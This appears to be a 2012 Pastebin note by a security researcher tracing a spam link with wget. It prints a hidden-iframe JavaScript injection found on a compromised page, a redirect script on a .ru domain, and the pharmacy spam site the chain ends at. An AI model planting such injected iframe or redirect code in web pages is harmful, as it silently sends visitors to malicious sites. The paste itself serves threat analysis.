API tools faq
paste
Advertisement
unixfreaxjp

Pseudo DNS/A w/injected code (NEW) & tor blocker(NEW)

unixfreaxjp
Sep 20th, 2012
265
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.87 KB | None | 0 0
raw download clone embed print report
  1.  
  2. // following spam link....
  3.  
  4. --15:21:04-- http://192.220.87.172/
  5. => `index.html'
  6. Connecting to 192.168.7.11:8118... connected.
  7. Proxy request sent, awaiting response... 200 OK
  8. Length: 1,038 (1.0K) [text/html]
  9. 15:21:05 (10.21 KB/s) - `index.html' saved [1038/1038]
  10.  
  11. // ↑contains...INJECTED code ↓
  12. :
  13. <!--c3284d--><script type="text/javascript">
  14. function frmAdd() {
  15. var ifrm = document.createElement('iframe');
  16. ifrm.style.position='absolute';
  17. ifrm.style.top='-999em';
  18. ifrm.style.left='-999em';
  19. ifrm.src = "http://wydybpuv.ru/count27.php";
  20. ifrm.id = 'frmId';
  21. document.body.appendChild(ifrm);
  22. };
  23. window.onload = frmAdd;
  24. </script><!--/c3284d-->
  25.  
  26.  
  27. // following the links.. is the pseudo a/dns record redirector
  28. domain, let's see where it goes..↓
  29.  
  30. --15:23:16-- http://wydybpuv.ru/count27.php
  31. => `count27.php'
  32. Connecting to 192.168.7.11:8118... connected.
  33. Proxy request sent, awaiting response... 200
  34. Length: 142 []
  35. Last-modified header invalid -- time-stamp ignored.
  36. 15:23:17 (494.72 B/s) - `count27.php' saved [142/142]
  37.  
  38. //↑contains↓
  39.  
  40. <!DOCTYPE HTML><html><head><script type="text/javascript">parent.location.href = "http://goherdscan.com/";</script></head><body></body></html>
  41.  
  42.  
  43. // following the links..
  44.  
  45. --15:24:46-- http://goherdscan.com   // tor conns take 1 ... fail..
  46. => `index.html.1'
  47. Connecting to 192.168.7.11:8118... connected.
  48. Proxy request sent, awaiting response... ^C
  49. C:\Program Files\GnuWin32\bin\dump>
  50.  
  51.  
  52. --15:25:33-- http://goherdscan.com/   // tor conns take 2 ... fail..
  53. => `index.html.1'
  54. Connecting to 192.168.7.11:8118... connected.
  55. Proxy request sent, awaiting response... ^C
  56.  
  57.  
  58. --15:26:00-- http://goherdscan.com/ // wtf.. get rid of the tor, use bouncer...
  59. => `index.html.1'
  60. Resolving goherdscan.com... 94.23.242.200
  61. Connecting to goherdscan.com|94.23.242.200|:80... connected.
  62. HTTP request sent, awaiting response... 200 OK
  63. Length: unspecified [text/html]
  64. 15:26:02 (56.32 KB/s) - `index.html.1' saved [54634]
  65.  
  66. // ending up with the adult pharma spam sites, below lynx snipped..
  67.  
  68. My Canadian Pharmacy - Canadian Quality Medications at Affordable Price (p1 of 4)
  69. My Canadian Pharmacy
  70. USD GBP CAD EUR AUD CHF
  71. [search_button.gif]-Submit Enter product name_______
  72. * Men's Health
  73. + Viagra bestseller
  74. + Cialis bestseller
  75. + Viagra Super Active+ bestseller
  76. + Levitra bestseller
  77. + Viagra Professional bestseller
  78. + Viagra Super Force bestseller
  79. + Cialis Super Active+ bestseller
  80. + Cialis Professional bestseller
  81. + Cialis Soft Tabs bestseller
  82. + Viagra Soft Tabs bestseller
  83. + Propecia bestseller
  84. + Super Active ED Pack
  85. + VPXL
  86. + Maxaman bestseller
  87. + View all products
  88. * Pain Relief
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!